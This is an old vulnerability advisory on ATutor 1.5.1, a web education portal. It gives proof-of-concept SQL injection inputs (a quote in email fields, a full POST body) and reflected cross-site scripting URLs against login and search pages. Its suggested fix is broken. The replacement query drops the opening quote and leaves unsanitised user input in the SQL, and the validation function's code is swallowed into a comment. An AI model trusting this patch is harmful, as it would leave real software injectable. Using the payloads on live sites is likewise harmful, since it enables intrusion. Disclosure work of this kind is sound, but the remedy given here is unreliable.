ATutor-1.5.1 SQL injection and XSS bugs

2005-08-18T00:00:00
ID SECURITYVULNS:DOC:9507
Type securityvulns
Reporter Securityvulns
Modified 2005-08-18T00:00:00

Description

TITLE:

ATutor-1.5.1 SQL injection and XSS bugs

Severity:

Medium or even critical

SOFTWARE:

ATutor-1.5.1 http://www.atutor.ca/

DESCRIPTION:

ATutor-1.5.1 is a web base education portal.THe system is vulnable to SQL injection and XSS attacks:

SQL injection:

http://localhost/tour/password_reminder.php type for e-mail (') and you will get a error message

http://localhost/tour/registration.php type for e-mail (') and you will get a error message

http://localhost/tour/registration.php then use some kind of a http header editor and post this login=1&password=1&password2=1&email=%27&lang=en&first_name=1&last_name=1&year=1&month=1&day=1&gender=m&address=1&postal=1&city=1&province=1&country=1&phone=1&website=http%3A%2F%2F&submit=%20Submit%20

xSS bugs:

http://localhost/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script>

http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages

http://localhost/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search

->Patch<-

function valid_name($name) {

// return FALSE if it contains characters which // which ARNT on the specified list if(ereg('[^[:space:]a-zA-Z0-9_.-]{1,}', $name)) { return false; } else { return true; }

}

Copyed from http://bg2.php.net/manual/en/function.eregi.php

OR

Open password_reminder.php and raplace

$sql = "SELECT login, password, email FROM ".TABLE_PREFIX."members WHERE email='$_POST[form_email]'";

With

$sql = "SELECT login, password, email FROM ".TABLE_PREFIX."members WHERE email=$_POST[form_email]'";

*This is only for password_reminder.php for the others you are on your one

Greets to all omega-team

                                                    Found by matrix_killer

http://jobs.gbg.bg/ - Търсите си работа? Вижте нашите актуални предложения !